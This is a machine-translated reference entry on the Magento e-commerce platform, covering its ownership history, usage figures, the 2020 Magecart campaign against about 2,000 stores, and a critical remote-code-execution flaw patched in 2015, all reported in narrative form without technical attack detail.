Developers: | Magento Inc. |
Last Release Date: | 2014/12/15 |
Technology: | CMS - Content management systems |
Content |
Magento is a popular management system for online stores in the world *, including in an Enterprise segment of solutions. In June, 2011 Magento Inc company. it was purchased by eBay Inc company. On May 21, 2018 Adobe announced acquisition of Magento for $1.68 billion. This transaction will allow the buyer to compete with market leaders of e-commerce of Salesforce.com and Oracle better.
Magento is multifunction, professional solution with the open code for e-commerce which provides full control over appearance, the contents and functionality of online store. The intuitive panel of administration contains powerful instruments of marketing, SEO and a management system for a product catalog, providing the companies to make the website proceeding from own preferences and requirements of business.
Magento is 150,000 clients, 6,400 modules, 800,000 associates, 4 million downloads of the Magento Community platform (data for summer of 2014).
2020: Cracking of 2 thousand online stores
On September 14, 2020 it became known of a large-scale hacker campaign within which in two days over 2000 online stores created on the basis of Magento were cracked.
Attacks to online stores were made according to the typical scheme Magecart when hackers crack the websites, and then implement harmful scripts in the source code of shops. The virus intercepts all data which the user enters into the corresponding fields at order placement and sends them to the server of malefactors.
On Friday 10 shops, then 1058 on Saturday, 603 on Sunday and 233 were infected today, - so on September 14, 2020 commented on an incident with Magento Willem de Groot, the founder of Sanguine Security (SanSec), Dutch firm on the cyber security specializing in tracking of the attacks of Magecart. |
Meanwhile experts of SanSec did not set, how exactly hackers cracked the affected websites, however Willem de Groot noted that in August, 2020 at hacker forums advertizing of vulnerability of zero day in Magento 1.x appeared. It demonstrates that hackers waited for a right moment. In the declaration somebody under the nickname z3r0day offered a RCE exploit for $5000.
SanSec also noted that the majority of the cracked websites used Magento of outdated version 1.x whose support was finally stopped on June 30, 2020. Besides, in 2019 cybersecurity specialists predicted growth of the attacks to Magento 1.x, being afraid that vulnerable as a result can be from 200,000 to 240,000 resources. Since then the number of vulnerable resources nevertheless was reduced, as of the middle of September, 2020 it reaches about 95,000.
This automated campaign, certainly, is the largest campaign which Sansec detected from the moment of the beginning of monitoring in 2015, - de Groot added. |
The previous record - 962 cracked shops in one day (an incident occurred in July, 2019).[1]
2015: In Magento critical vulnerability is detected
On April 22, 2015 it became known of detection of critical vulnerability in the open platform of e-commerce Magento[2].
Magento control panel, 2015
In February, 2015 critical vulnerability which allows attacking to execute any PHP code on the server was revealed and to get full access to data of online store, including information on credit cards of clients. The attack can be made passing the procedure of authentication. The problem is present at a basic unit of the Magento engine and is shown in default (default) configurations.
Correction of the code in updating SUPEE-5344, at the same time, because of the nondisclosure agreement is carried out, information on vulnerability was published only these days (on April 22, 2015).
Releases of Magento and program patches with elimination of vulnerabilities are delivered separately, i.e. the user needs to set release and to control emergence of patches, to apply them. Many users of Magento estimate relevance of the system on version number and do not care for installation of the adjusting patches that does their systems potentially vulnerable. For example, as a part of release of Magento 1.9.1.0 available as of April 22, 2015, corrections do not enter.
For April 22, 2015 more than 240 thousand online stores work at the Magento platform.